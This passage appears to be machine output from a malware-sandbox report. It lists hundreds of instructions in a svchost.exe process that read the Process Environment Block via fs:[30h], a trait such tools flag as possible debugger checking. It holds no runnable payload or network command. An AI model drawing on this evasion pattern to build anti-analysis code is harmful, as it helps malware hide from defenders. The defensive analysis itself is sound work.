            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302E388 mov eax, dword ptr fs:[00000030h]1_2_0302E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305438F mov eax, dword ptr fs:[00000030h]1_2_0305438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305438F mov eax, dword ptr fs:[00000030h]1_2_0305438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03028397 mov eax, dword ptr fs:[00000030h]1_2_03028397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03028397 mov eax, dword ptr fs:[00000030h]1_2_03028397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03028397 mov eax, dword ptr fs:[00000030h]1_2_03028397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030EC3CD mov eax, dword ptr fs:[00000030h]1_2_030EC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303A3C0 mov eax, dword ptr fs:[00000030h]1_2_0303A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303A3C0 mov eax, dword ptr fs:[00000030h]1_2_0303A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303A3C0 mov eax, dword ptr fs:[00000030h]1_2_0303A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303A3C0 mov eax, dword ptr fs:[00000030h]1_2_0303A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303A3C0 mov eax, dword ptr fs:[00000030h]1_2_0303A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303A3C0 mov eax, dword ptr fs:[00000030h]1_2_0303A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030383C0 mov eax, dword ptr fs:[00000030h]1_2_030383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030383C0 mov eax, dword ptr fs:[00000030h]1_2_030383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030383C0 mov eax, dword ptr fs:[00000030h]1_2_030383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030383C0 mov eax, dword ptr fs:[00000030h]1_2_030383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B63C0 mov eax, dword ptr fs:[00000030h]1_2_030B63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DE3DB mov eax, dword ptr fs:[00000030h]1_2_030DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DE3DB mov eax, dword ptr fs:[00000030h]1_2_030DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DE3DB mov ecx, dword ptr fs:[00000030h]1_2_030DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DE3DB mov eax, dword ptr fs:[00000030h]1_2_030DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D43D4 mov eax, dword ptr fs:[00000030h]1_2_030D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D43D4 mov eax, dword ptr fs:[00000030h]1_2_030D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030403E9 mov eax, dword ptr fs:[00000030h]1_2_030403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030403E9 mov eax, dword ptr fs:[00000030h]1_2_030403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030403E9 mov eax, dword ptr fs:[00000030h]1_2_030403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030403E9 mov eax, dword ptr fs:[00000030h]1_2_030403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030403E9 mov eax, dword ptr fs:[00000030h]1_2_030403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030403E9 mov eax, dword ptr fs:[00000030h]1_2_030403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030403E9 mov eax, dword ptr fs:[00000030h]1_2_030403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030403E9 mov eax, dword ptr fs:[00000030h]1_2_030403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304E3F0 mov eax, dword ptr fs:[00000030h]1_2_0304E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304E3F0 mov eax, dword ptr fs:[00000030h]1_2_0304E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304E3F0 mov eax, dword ptr fs:[00000030h]1_2_0304E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030663FF mov eax, dword ptr fs:[00000030h]1_2_030663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302823B mov eax, dword ptr fs:[00000030h]1_2_0302823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B8243 mov eax, dword ptr fs:[00000030h]1_2_030B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B8243 mov ecx, dword ptr fs:[00000030h]1_2_030B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0310625D mov eax, dword ptr fs:[00000030h]1_2_0310625D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302A250 mov eax, dword ptr fs:[00000030h]1_2_0302A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03036259 mov eax, dword ptr fs:[00000030h]1_2_03036259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030EA250 mov eax, dword ptr fs:[00000030h]1_2_030EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030EA250 mov eax, dword ptr fs:[00000030h]1_2_030EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03034260 mov eax, dword ptr fs:[00000030h]1_2_03034260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03034260 mov eax, dword ptr fs:[00000030h]1_2_03034260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03034260 mov eax, dword ptr fs:[00000030h]1_2_03034260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302826B mov eax, dword ptr fs:[00000030h]1_2_0302826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]1_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]1_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]1_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]1_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]1_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]1_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]1_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]1_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]1_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]1_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]1_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]1_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306E284 mov eax, dword ptr fs:[00000030h]1_2_0306E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306E284 mov eax, dword ptr fs:[00000030h]1_2_0306E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B0283 mov eax, dword ptr fs:[00000030h]1_2_030B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B0283 mov eax, dword ptr fs:[00000030h]1_2_030B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B0283 mov eax, dword ptr fs:[00000030h]1_2_030B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030402A0 mov eax, dword ptr fs:[00000030h]1_2_030402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030402A0 mov eax, dword ptr fs:[00000030h]1_2_030402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C62A0 mov eax, dword ptr fs:[00000030h]1_2_030C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C62A0 mov ecx, dword ptr fs:[00000030h]1_2_030C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C62A0 mov eax, dword ptr fs:[00000030h]1_2_030C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C62A0 mov eax, dword ptr fs:[00000030h]1_2_030C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C62A0 mov eax, dword ptr fs:[00000030h]1_2_030C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C62A0 mov eax, dword ptr fs:[00000030h]1_2_030C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303A2C3 mov eax, dword ptr fs:[00000030h]1_2_0303A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303A2C3 mov eax, dword ptr fs:[00000030h]1_2_0303A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303A2C3 mov eax, dword ptr fs:[00000030h]1_2_0303A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303A2C3 mov eax, dword ptr fs:[00000030h]1_2_0303A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303A2C3 mov eax, dword ptr fs:[00000030h]1_2_0303A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031062D6 mov eax, dword ptr fs:[00000030h]1_2_031062D6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030402E1 mov eax, dword ptr fs:[00000030h]1_2_030402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030402E1 mov eax, dword ptr fs:[00000030h]1_2_030402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030402E1 mov eax, dword ptr fs:[00000030h]1_2_030402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DE10E mov eax, dword ptr fs:[00000030h]1_2_030DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DE10E mov ecx, dword ptr fs:[00000030h]1_2_030DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DE10E mov eax, dword ptr fs:[00000030h]1_2_030DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DE10E mov eax, dword ptr fs:[00000030h]1_2_030DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DE10E mov ecx, dword ptr fs:[00000030h]1_2_030DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DE10E mov eax, dword ptr fs:[00000030h]1_2_030DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DE10E mov eax, dword ptr fs:[00000030h]1_2_030DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DE10E mov ecx, dword ptr fs:[00000030h]1_2_030DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DE10E mov eax, dword ptr fs:[00000030h]1_2_030DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DE10E mov ecx, dword ptr fs:[00000030h]1_2_030DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DA118 mov ecx, dword ptr fs:[00000030h]1_2_030DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DA118 mov eax, dword ptr fs:[00000030h]1_2_030DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DA118 mov eax, dword ptr fs:[00000030h]1_2_030DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DA118 mov eax, dword ptr fs:[00000030h]1_2_030DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F0115 mov eax, dword ptr fs:[00000030h]1_2_030F0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03060124 mov eax, dword ptr fs:[00000030h]1_2_03060124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C4144 mov eax, dword ptr fs:[00000030h]1_2_030C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C4144 mov eax, dword ptr fs:[00000030h]1_2_030C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C4144 mov ecx, dword ptr fs:[00000030h]1_2_030C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C4144 mov eax, dword ptr fs:[00000030h]1_2_030C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C4144 mov eax, dword ptr fs:[00000030h]1_2_030C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302C156 mov eax, dword ptr fs:[00000030h]1_2_0302C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C8158 mov eax, dword ptr fs:[00000030h]1_2_030C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03036154 mov eax, dword ptr fs:[00000030h]1_2_03036154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03036154 mov eax, dword ptr fs:[00000030h]1_2_03036154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03104164 mov eax, dword ptr fs:[00000030h]1_2_03104164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03104164 mov eax, dword ptr fs:[00000030h]1_2_03104164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03070185 mov eax, dword ptr fs:[00000030h]1_2_03070185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030EC188 mov eax, dword ptr fs:[00000030h]1_2_030EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030EC188 mov eax, dword ptr fs:[00000030h]1_2_030EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D4180 mov eax, dword ptr fs:[00000030h]1_2_030D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D4180 mov eax, dword ptr fs:[00000030h]1_2_030D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B019F mov eax, dword ptr fs:[00000030h]1_2_030B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B019F mov eax, dword ptr fs:[00000030h]1_2_030B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B019F mov eax, dword ptr fs:[00000030h]1_2_030B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B019F mov eax, dword ptr fs:[00000030h]1_2_030B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302A197 mov eax, dword ptr fs:[00000030h]1_2_0302A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302A197 mov eax, dword ptr fs:[00000030h]1_2_0302A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302A197 mov eax, dword ptr fs:[00000030h]1_2_0302A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F61C3 mov eax, dword ptr fs:[00000030h]1_2_030F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F61C3 mov eax, dword ptr fs:[00000030h]1_2_030F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AE1D0 mov eax, dword ptr fs:[00000030h]1_2_030AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AE1D0 mov eax, dword ptr fs:[00000030h]1_2_030AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AE1D0 mov ecx, dword ptr fs:[00000030h]1_2_030AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AE1D0 mov eax, dword ptr fs:[00000030h]1_2_030AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AE1D0 mov eax, dword ptr fs:[00000030h]1_2_030AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031061E5 mov eax, dword ptr fs:[00000030h]1_2_031061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030601F8 mov eax, dword ptr fs:[00000030h]1_2_030601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B4000 mov ecx, dword ptr fs:[00000030h]1_2_030B4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D2000 mov eax, dword ptr fs:[00000030h]1_2_030D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D2000 mov eax, dword ptr fs:[00000030h]1_2_030D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D2000 mov eax, dword ptr fs:[00000030h]1_2_030D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D2000 mov eax, dword ptr fs:[00000030h]1_2_030D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D2000 mov eax, dword ptr fs:[00000030h]1_2_030D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D2000 mov eax, dword ptr fs:[00000030h]1_2_030D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D2000 mov eax, dword ptr fs:[00000030h]1_2_030D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D2000 mov eax, dword ptr fs:[00000030h]1_2_030D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304E016 mov eax, dword ptr fs:[00000030h]1_2_0304E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304E016 mov eax, dword ptr fs:[00000030h]1_2_0304E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304E016 mov eax, dword ptr fs:[00000030h]1_2_0304E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304E016 mov eax, dword ptr fs:[00000030h]1_2_0304E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302A020 mov eax, dword ptr fs:[00000030h]1_2_0302A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302C020 mov eax, dword ptr fs:[00000030h]1_2_0302C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C6030 mov eax, dword ptr fs:[00000030h]1_2_030C6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03032050 mov eax, dword ptr fs:[00000030h]1_2_03032050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B6050 mov eax, dword ptr fs:[00000030h]1_2_030B6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305C073 mov eax, dword ptr fs:[00000030h]1_2_0305C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303208A mov eax, dword ptr fs:[00000030h]1_2_0303208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030280A0 mov eax, dword ptr fs:[00000030h]1_2_030280A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C80A8 mov eax, dword ptr fs:[00000030h]1_2_030C80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F60B8 mov eax, dword ptr fs:[00000030h]1_2_030F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F60B8 mov ecx, dword ptr fs:[00000030h]1_2_030F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B20DE mov eax, dword ptr fs:[00000030h]1_2_030B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302A0E3 mov ecx, dword ptr fs:[00000030h]1_2_0302A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030380E9 mov eax, dword ptr fs:[00000030h]1_2_030380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B60E0 mov eax, dword ptr fs:[00000030h]1_2_030B60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302C0F0 mov eax, dword ptr fs:[00000030h]1_2_0302C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030720F0 mov ecx, dword ptr fs:[00000030h]1_2_030720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306C700 mov eax, dword ptr fs:[00000030h]1_2_0306C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03030710 mov eax, dword ptr fs:[00000030h]1_2_03030710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03060710 mov eax, dword ptr fs:[00000030h]1_2_03060710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306C720 mov eax, dword ptr fs:[00000030h]1_2_0306C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306C720 mov eax, dword ptr fs:[00000030h]1_2_0306C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306273C mov eax, dword ptr fs:[00000030h]1_2_0306273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306273C mov ecx, dword ptr fs:[00000030h]1_2_0306273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306273C mov eax, dword ptr fs:[00000030h]1_2_0306273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AC730 mov eax, dword ptr fs:[00000030h]1_2_030AC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306674D mov esi, dword ptr fs:[00000030h]1_2_0306674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306674D mov eax, dword ptr fs:[00000030h]1_2_0306674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306674D mov eax, dword ptr fs:[00000030h]1_2_0306674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03030750 mov eax, dword ptr fs:[00000030h]1_2_03030750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030BE75D mov eax, dword ptr fs:[00000030h]1_2_030BE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072750 mov eax, dword ptr fs:[00000030h]1_2_03072750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072750 mov eax, dword ptr fs:[00000030h]1_2_03072750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B4755 mov eax, dword ptr fs:[00000030h]1_2_030B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03038770 mov eax, dword ptr fs:[00000030h]1_2_03038770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D678E mov eax, dword ptr fs:[00000030h]1_2_030D678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030307AF mov eax, dword ptr fs:[00000030h]1_2_030307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E47A0 mov eax, dword ptr fs:[00000030h]1_2_030E47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303C7C0 mov eax, dword ptr fs:[00000030h]1_2_0303C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B07C3 mov eax, dword ptr fs:[00000030h]1_2_030B07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030527ED mov eax, dword ptr fs:[00000030h]1_2_030527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030527ED mov eax, dword ptr fs:[00000030h]1_2_030527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030527ED mov eax, dword ptr fs:[00000030h]1_2_030527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030BE7E1 mov eax, dword ptr fs:[00000030h]1_2_030BE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030347FB mov eax, dword ptr fs:[00000030h]1_2_030347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030347FB mov eax, dword ptr fs:[00000030h]1_2_030347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AE609 mov eax, dword ptr fs:[00000030h]1_2_030AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304260B mov eax, dword ptr fs:[00000030h]1_2_0304260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304260B mov eax, dword ptr fs:[00000030h]1_2_0304260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304260B mov eax, dword ptr fs:[00000030h]1_2_0304260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304260B mov eax, dword ptr fs:[00000030h]1_2_0304260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304260B mov eax, dword ptr fs:[00000030h]1_2_0304260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304260B mov eax, dword ptr fs:[00000030h]1_2_0304260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304260B mov eax, dword ptr fs:[00000030h]1_2_0304260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072619 mov eax, dword ptr fs:[00000030h]1_2_03072619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304E627 mov eax, dword ptr fs:[00000030h]1_2_0304E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03066620 mov eax, dword ptr fs:[00000030h]1_2_03066620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03068620 mov eax, dword ptr fs:[00000030h]1_2_03068620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303262C mov eax, dword ptr fs:[00000030h]1_2_0303262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304C640 mov eax, dword ptr fs:[00000030h]1_2_0304C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F866E mov eax, dword ptr fs:[00000030h]1_2_030F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F866E mov eax, dword ptr fs:[00000030h]1_2_030F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306A660 mov eax, dword ptr fs:[00000030h]1_2_0306A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306A660 mov eax, dword ptr fs:[00000030h]1_2_0306A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03062674 mov eax, dword ptr fs:[00000030h]1_2_03062674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03034690 mov eax, dword ptr fs:[00000030h]1_2_03034690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03034690 mov eax, dword ptr fs:[00000030h]1_2_03034690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306C6A6 mov eax, dword ptr fs:[00000030h]1_2_0306C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030666B0 mov eax, dword ptr fs:[00000030h]1_2_030666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306A6C7 mov ebx, dword ptr fs:[00000030h]1_2_0306A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306A6C7 mov eax, dword ptr fs:[00000030h]1_2_0306A6C7
